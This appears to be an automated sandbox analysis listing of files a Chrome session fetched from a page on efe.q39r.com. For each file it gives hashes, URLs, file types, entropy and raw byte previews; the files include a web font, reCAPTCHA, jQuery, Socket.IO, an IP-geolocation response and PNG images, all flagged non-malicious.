                                MD5:A69E9AB8AFDD7486EC0749C551051FF2
                                SHA1:C34E6AA327B536FB48D1FE03577A47C7EE2231B8
                                SHA-256:FD78A1913DB912221B8EAD1E62FAD47D1FF0A9FA6CD88D3B128A721AD91D2FAF
                                SHA-512:9A0E4297282542B8813F9CC85B2CCB09663CE281F64503F9A5284631881DA9AACF7649553BF1423D941F01B97E6BC3BA50AB13E55E4B7B61C5AA0A4ADF4D390F
                                Malicious:false
                                Reputation:unknown
                                URL:https://efe.q39r.com/23DAet5fBRf4MqRhPVabvhlny9x7COvw70
                                Preview:wOFF.......X......6........0...(............DSIG...(............GPOS..........^>....GSUB.............3y.OS/2.......F...`h`{Zcmap...........<.?+.cvt .......0...<(...fpgm............?...gasp................glyf.."0..Tl...h...+head..v....4...6..}.hhea..v....!...$...Zhmtx..v........x;...loca..z|...........tmaxp..~$... ... .-..name..~D.......'....post............1+.,prep.............P..x..\.|U..Nr.^.......DD.T....V...C....U._.N..k.8.m...h.Q.6q....#....Y4l.}3.@ .............Z_....s.....>RD.....J....wR./...#.,<'f....4b..}(....P..\.s.9'.....-.Q..d..H.@%..K+....4U.4...yx.3..DkfJ..3S.H......|..........%.B...........W.~..nN<x.?....}jn...W..M.7...?...:-uAjQ.4J.].vm....H{&...y..@....G...~.......x=.V..g.;..@..J.l...G..L... g*M..h.....Q!}B...Q.m.M...R.5*.JUi*..U_5@]..PW...*5H.VW.k..:5D].nP#..5V=....x.....W/...E5I...NVS.T.u...^U3._...m5G-P...U...Gj.*V..j.Z...j..BJ.._Pw..0..f*...q...q5...'.F=MIj.7..^.f."..K\..pHMC.t.W.Z.Bz...l.+.....e|......B>....1.a,.D.Ej..(.
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (631)
                                Category:downloaded
                                Size (bytes):517649
                                Entropy (8bit):5.713376874006511
                                Encrypted:false
                                SSDEEP:
                                MD5:E2E79D6B927169D9E0E57E3BAECC0993
                                SHA1:1299473950B2999BA0B7F39BD5E4A60EAFD1819D
                                SHA-256:231336ED913A5EBD4445B85486E053CAF2B81CAB91318241375F3F7A245B6C6B
                                SHA-512:D6A2ED7B19E54D1447EE9BBC684AF7101B48086945A938A5F9B6AE74ACE30B9A98CA83D3183814DD3CC40F251AB6433DC7F8B425F313EA9557B83E1C2E035DFF
                                Malicious:false
                                Reputation:unknown
                                URL:https://www.gstatic.com/recaptcha/releases/V6_85qpc2Xf2sbe3xTnRte7m/recaptcha__en.js
                                Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.. Copyright The Closure Library Authors.. SPDX-License-Identifier: MIT.*/./*.. Apache License. Version 2.0, January 2004. https://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that contro
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                Category:downloaded
                                Size (bytes):61
                                Entropy (8bit):3.990210155325004
                                Encrypted:false
                                SSDEEP:
                                MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                Malicious:false
                                Reputation:unknown
                                URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D
                                Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (65447)
                                Category:downloaded
                                Size (bytes):89501
                                Entropy (8bit):5.289893677458563
                                Encrypted:false
                                SSDEEP:
                                MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                Malicious:false
                                Reputation:unknown
                                URL:https://code.jquery.com/jquery-3.6.0.min.js
                                Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):773
                                Entropy (8bit):4.731457678411383
                                Encrypted:false
                                SSDEEP:
                                MD5:0080476117266E35D3FCD1AD3305D0E5
                                SHA1:A20D1495A11CE72EC68F182D37B1B1F73A63152E
                                SHA-256:7634C9B946D6849A938A3A6F41AE27D3C2AEFCBACAFC0CAB5CDA19800E2786D6
                                SHA-512:0BBD6466F2C7E8865937C4830A5F83618E27BFC691FA387EF3D14B0ED4C171476626700C270839663F9474D0D705B39E7FA50CE26C54636493B41D9E33380949
                                Malicious:false
                                Reputation:unknown
                                Preview:{. "ip": "185.152.66.230",. "network": "185.152.66.0/24",. "version": "IPv4",. "city": "Atlanta",. "region": "Georgia",. "region_code": "GA",. "country": "US",. "country_name": "United States",. "country_code": "US",. "country_code_iso3": "USA",. "country_capital": "Washington",. "country_tld": ".us",. "continent_code": "NA",. "in_eu": false,. "postal": "30301",. "latitude": 33.7485,. "longitude": -84.3871,. "timezone": "America/New_York",. "utc_offset": "-0400",. "country_calling_code": "+1",. "currency": "USD",. "currency_name": "Dollar",. "languages": "en-US,es-US,haw,fr",. "country_area": 9629091.0,. "country_population": 327167434,. "asn": "AS60068",. "org": "Datacamp Limited".}
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:PNG image data, 506 x 303, 8-bit/color RGBA, non-interlaced
                                Category:dropped
                                Size (bytes):29796
                                Entropy (8bit):7.980058333789969
                                Encrypted:false
                                SSDEEP:
                                MD5:210433A8774859368F3A7B86D125A2A7
                                SHA1:408BACDDC39F12CAD285579C102FE4A629862D88
                                SHA-256:9C6ADDFC339CE1C1D262290AB4CC2DE8D38D4B54B11A8E85AFD44FBB0ACC2561
                                SHA-512:6CBF6492BBA0734ECE1B595743B7A251D3C98425A36D5BF87EBFAD17BE979A23ADEE556FB074EF6D284052F6412ACEDA4E179FB7DFA0BA1103610CC01113A1A3
                                Malicious:false
                                Reputation:unknown
                                Preview:.PNG........IHDR......./.............sRGB....... .IDATx^.].XSI.=. M....T.`...X......}.]..}...e.k..{.(*V...`...o&..)i/......H2s..s.yo..Xa.0.......C@.....2f.C.!..`.0...`D..!..`.0..."F......Lc.0.......#z..............^..W......vEa..(R...W.o.J.km..k`.e.2.......`D.7.Z.w..!n......T....@..M.GO.892?+.....`.0...#...4..]n....{.Z....b...h..l.,...B.5b.0...........Vs......T...r.Wy...(..Gg..r....>&$.S.G.D.......]...I..S.....v.....9S.!..`.......F.'y3g...]+.fai.....T.....).%!.....{.7.u}}+a..p(X..]!...C.!.....l....W.Y..=[..K.wt...v....mD.5...ii....W.....z*#..0......D.....FV.w..,.T..............X.|..|.Let....F.d.W.Q.!..`....l...Wg..~.6./^..A.w..nE.}..`ff...S..p..>..!C.")).O.>E...9../?..+.b..H."p-R.N..X.h..&.!..`.h..6X...... ..33s..;Y...9u....c.w#..[^.suu...;%....W/.vymX<.2...`.0.4G....bx....C.vr+.5.I...h............8.".q...|v...[/....C.jUY\..9.!..`......5.t..K...-.R.4h....i..[\.N...<y,0j.l...G.z..7....H....e..y..R.N..(\.(....[.RSR..........w.......x.
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:PNG image data, 2446 x 899, 8-bit/color RGBA, non-interlaced
                                Category:dropped
                                Size (bytes):70712
                                Entropy (8bit):6.94130504124589
                                Encrypted:false
                                SSDEEP:
                                MD5:F70FF06D19498D80B130EC78176FD3FF
                                SHA1:9D8A3B74C5164FF7AE2C7930B6D7B14707B404FC
                                SHA-256:DF6DBAB5251E56B405E48AAF57D3CD4188F073FFBA71131FA6CD26E6742923AE
                                SHA-512:543151693C3751A7E6B1B6A9EA77B83CFD049BC320EE75B666514076F4C0218E9DC23DA5E6C932B2B8670AA1BE1D4E9A91A889F5C6F0D7B9F9C9FE6694609B31
                                Malicious:false
                                Reputation:unknown
                                Preview:.PNG........IHDR................... .IDATx....q......!8.on.....{....4{..{U.A!x...t3P.~.S86...N....7USM....p.".?..>.G....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @.......
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:Web Open Font Format (Version 2), TrueType, length 43596, version 1.0
                                Category:downloaded
                                Size (bytes):43596
                                Entropy (8bit):7.9952701440723475
                                Encrypted:true
                                SSDEEP:
                                MD5:2A05E9E5572ABC320B2B7EA38A70DCC1
                                SHA1:D5FA2A856D5632C2469E42436159375117EF3C35
                                SHA-256:3EFCB941AADDAF4AEA08DAB3FB97D3E904AA1B83264E64B4D5BDA53BC7C798EC
                                SHA-512:785AB5585B8A9ED762D70578BF13A6A69342441E679698FD946E3616EF5688485F099F3DC472975EF5D9248AFAAD6DA6779813B88AA1DB60ABE2CC065F47EB5F
                                Malicious:false
                                Reputation:unknown
                                URL:https://efe.q39r.com/89Fdrete7qC83lweffEhC5Xyz80
                                Preview:wOF2.......L.......P..............................U...z...?HVAR.;?MVARF.`?STAT...H/L.....@..P..>.0....6.$..x. .....{[.q....Rl....t..~v....(....T.t.;..n'..v=....?...l].xI...m."..?hNX.,...8.;G...m,}.h.>(=[...m/.>....8&f..&.......].u...&.VD..].<..yR.eb<,x......)..c..t...k...9..o.T..R9..kq..TR%U..v....r._......D...f..=qH...8.<...x..(V.I.h.L3*#]8...-.z.........3.9V..........u.........x.....S_...\1...&6...j^...c;()m.J.....>....xz..Y...|.7......!.jw...,.L.;N.......n......].....8].R..d.....`.R.B..#..,...1R.UJD..b.`.0<....FA=..{.....`....c...R..Uy..J.k.".j..N.{w..UT<.8T66...H,...FH.GS.G.]......?.T.!4..8...B...l.p@.......t.o...v...b.g..?..m..!.%.....x..MC1M...........k...})..+N.....Q_yS.X.11a....&`..'".xZ..=b^...iD...} .. ..b...}DIvu.q....k.4.....@.....P*..j..)..'.L......b..RQjI*I..Qk.T.l._wO..$....!c..%.{.._N..E@....A...?...aW.y.gf.g.&E... ~.x.b....b...~......f/.....G....J.6.y.....zE@T.a.0^Ul......S:..,..}..B.R..Rt~.v...L:`4.IKA..V...x&@...h.7.P.....*.
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:ASCII text, with very long lines (45667)
                                Category:downloaded
                                Size (bytes):45806
                                Entropy (8bit):5.207605835316031
                                Encrypted:false
                                SSDEEP:
                                MD5:80F5B8C6A9EEAC15DE93E5A112036A06
                                SHA1:F7174635137D37581B11937FC90E9CB325077BCE
                                SHA-256:0401DE33701F1CAD16ECF952899D23990B6437D0A5B7335524EDF6BDFB932542
                                SHA-512:B976A5F02202439D94C6817D037C813FA1945C6BB93762284D97FF61718C5B833402F372562034663A467FDBAA46990DE24CB1E356392340E64D034E4BA1B4E4
                                Malicious:false
                                Reputation:unknown
                                URL:https://cdn.socket.io/4.6.0/socket.io.min.js
                                Preview:/*!. * Socket.IO v4.6.0. * (c) 2014-2023 Guillermo Rauch. * Released under the MIT License.. */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(t="undefined"!=typeof globalThis?globalThis:t||self).io=e()}(this,(function(){"use strict";function t(e){return t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t},t(e)}function e(t,e){if(!(t instanceof e))throw new TypeError("Cannot call a class as a function")}function n(t,e){for(var n=0;n<e.length;n++){var r=e[n];r.enumerable=r.enumerable||!1,r.configurable=!0,"value"in r&&(r.writable=!0),Object.defineProperty(t,r.key,r)}}function r(t,e,r){return e&&n(t.prototype,e),r&&n(t,r),Object.defineProperty(t,"prototype",{writable:!1}),t}function i(){return i=Object.assign?Object.assign.bind():function(t){for(var e=
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                Category:dropped
                                Size (bytes):727
                                Entropy (8bit):7.573165690842521
                                Encrypted:false
                                SSDEEP:
                                MD5:839CB0F55C3D2D5C2F740BDA95CB2878
                                SHA1:93F6FA3A2DA8B7184D4B5C5F2065872793370C2E
                                SHA-256:40ECB8832F6A9A8AAA0CC6E1287E867A4FCA38433D091D86C6CAB1F28FBAB652
                                SHA-512:ECBCA8AB21BF3302C88F933CFD248CFF5553AFE152A170F554C27FD67BDC3E7D8CE79E202561FD0658E41820681EB90F74E38FD09390C517AFB34D2C1B65A096
                                Malicious:false
                                Reputation:unknown
                                Preview:.PNG........IHDR...0...0.....W.......IDAThC.Q.1.E.......`... .............T...:....7r....sw;Y.h..dK__.........M.v.....@a....j..P.;..K....^%..m...Nn.......y..l.]@..z.T..X..e...DZ.$Y......o`.L@`..r.0...s8Bd...1..M.=.A...a.'./...O....@4.mk..2.\..H.ER...e....s...`._.;..5n...X|o..K....w...8........i8L..6P|r9.=!...j..........~X{.Y.5X....4...v.Z.&.... ..)..ZXJ.8..... ..-p.9t.N...r.[..t....=\ >pLg%m..@........8o.).%..S...d.E|%.......5.p..QK0Z<...0...:Q...<.m^<.y....7..#r..Qm...DZ..}.5.c.&.....0..Wr.....w.f-.n... .-..,l..0..3...E..4k.~..Y.B:t.*}.L..z..U.b......s............w.(......jt.Z5.7..8........0...?..1.w."&......8j.5vO.<..OgSM.j%..u..E=:..XJ==.....(...30.(....O)41P.....pkQ@f.S.....IEND.B`.
                                No static file info